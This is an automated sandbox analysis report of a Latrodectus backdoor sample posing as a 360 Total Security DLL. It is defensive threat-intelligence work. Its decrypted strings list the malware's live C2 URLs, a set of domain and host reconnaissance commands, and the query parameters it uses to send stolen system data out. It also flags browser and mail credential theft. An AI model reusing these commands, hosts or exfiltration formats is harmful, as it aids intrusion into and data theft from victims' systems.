Windows Analysis Report
360total.dll.dll

Overview

General Information

Sample name: 360total.dll.dll
(renamed file extension from exe to dll)
Original sample name: 360total.dll.exe
Analysis ID: 1432373
MD5: bd3a3714ee9a071ebeb59ac91d9ebb5a
SHA1: 55110a221f20a4ceec34c58d0179fa31f8c102e9
SHA256: 4cf2b612939359977df51a32d2f63e2cb0c6c601e114b8e4812bd548d1db85fe
Tags: exe
Infos:

Detection

Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Deletes itself after installation
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Name Description Attribution Blogpost URLs Link
Unidentified 111 (Latrodectus), Latrodectus First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

AV Detection
barindex
Found malware configuration
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll ReversingLabs: Detection: 18%
Multi AV Scanner detection for submitted file
Source: 360total.dll.dll ReversingLabs: Detection: 18%
Sample uses string decryption to hide its real strings
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c ipconfig /all
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c systeminfo
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c nltest /domain_trusts
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c net view /all /domain
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c net view /all
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &ipconfig=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c net config workstation
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c whoami /groups
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &systeminfo=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &domain_trusts=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &domain_trusts_all=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_view_all_domain=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_view_all=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_group=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &wmic=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_config_ws=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_wmic_av=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &whoami_group=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "pid":
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%d",
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "proc":
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s",
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "subproc": [
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &proclist=[
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "pid":
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%d",
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "proc":
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s",
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "subproc": [
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &desklinks=[
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: *.*
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s"
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Update_%x
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Custom_update
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: .dll
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: .exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Updater
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s"
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: rundll32.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s", %s %s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: runnung
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: :wtfbbq
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: files/bp.dat
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s\%d.dll
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %d.dat
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s\%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: init -zzzz="%s\%s"
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: front
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /files/
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Facial
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: !"$%&()*wp
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: .exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: POST
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: GET
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: curl/7.88.1
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: pN
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: URLS
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: COMMAND
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: ERROR
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: <html>
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: <!DOCTYPE
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s%d.dll
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: 12345
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &stiller=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s%d.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: LogonTrigger
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %x%x
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: TimeTrigger
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: PT0H%02dM
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &mac=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %02x
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: :%02x
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: PT0S
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &computername=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &domain=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: \*.dll
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: \Registry\Machine\
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: https://jarinamaers.shop/live/
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: https://startmast.shop/live/
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: AppData
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Desktop
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Startup
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Personal
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Local AppData
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: \update_data.dat
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: pN
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: URLS|%d|%s
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 3_2_000000018003BC0C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E5E5C CryptUnprotectData,RtlDeleteBoundaryDescriptor, 8_3_000001E3B57E5E5C
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
Source: unknown HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.42.73.28:443 -> 192.168.2.5:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.207:443 -> 192.168.2.5:49781 version: TLS 1.2
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr

Spreading
barindex
Performs a network lookup / discovery via net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 4_2_00000237C16CA350
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00000237C16C1A08
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E16F4 FindFirstFileW,FindNextFileW, 8_3_000001E3B57E16F4
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E6604 FindFirstFileA,FindNextFileA, 8_3_000001E3B57E6604
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\ Jump to behavior

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.46.75 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.84.207 443 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor URLs: https://startmast.shop/live/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1714166397033Host: self.events.data.microsoft.comContent-Length: 7972Connection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C8D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 4_2_00000237C16C8D90
